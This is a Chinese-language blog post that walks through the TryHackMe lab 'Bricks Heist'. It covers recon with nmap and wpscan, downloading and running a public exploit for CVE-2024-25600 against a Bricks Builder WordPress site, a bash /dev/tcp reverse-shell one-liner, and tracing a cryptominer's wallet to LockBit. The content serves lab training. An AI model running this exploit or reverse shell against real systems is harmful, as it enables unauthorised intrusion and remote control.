Featured image of post thm日记
刷题&&打靶

thm日记

thm日记

TryHack3M: Bricks Heist

先在etc/hosts下面写入bricks.thm的ip

1
2
3

cd /etc 
echo "10.10.182.111 bricks.thm" >>hosts
cat hosts

然后nmap扫端口

1

nmap -sV bricks.thm

22,80,443,3306端口开放

进入界面发现是WordPress

用wpscan扫描

1

wpscan --url https://bricks.thm --disable-tls-checks

wordpress bricks 1.9.5

有一个cve:CVE-2024-25600

https://github.com/K3ysTr0K3R/CVE-2024-25600-EXPLOIT

1

wget https://raw.githubusercontent.com/K3ysTr0K3R/CVE-2024-25600-EXPLOIT/main/CVE-2024-25600.py

1

python3 CVE-2024-25600.py -u https://bricks.thm

拿到shell

1

cat 650c844110baced87e1606453b93f22a.txt

查看可疑进程

1

systemctl | grep running

下面这个就可以知道可以进程的名称

1

systemctl status ubuntu.service

用前下的shell进行nc监听反弹shell

1

bash -c 'exec bash -i &>/dev/tcp/ip/port <&1'

前下知道进程名称为nm-inet-dialog

下面有他的目录

1

ls -la

发现inet.conf文件

1

head inet.conf

回显一串16进制字符,双层base64解密后得到字符串

去blockchain官网

1

bc1qyk79fcp9hd5kreprce89tkh4wrtl8avt4l67qa

https://www.blockchain.com/explorer/addresses/btc/bc1qyk79fcp9hd5kreprce89tkh4wrtl8avt4l67qa

复制钱的来源

1

bc1q5jqgm7nvrhaw2rh2vk0dk8e4gg5g373g0vz07r

https://ofac.treasury.gov/recent-actions/20240220

这里找到它们的组织是LockBit

© 2025 无敌可爱美咕噜
使用 Hugo 构建
主题 StackJimmy 设计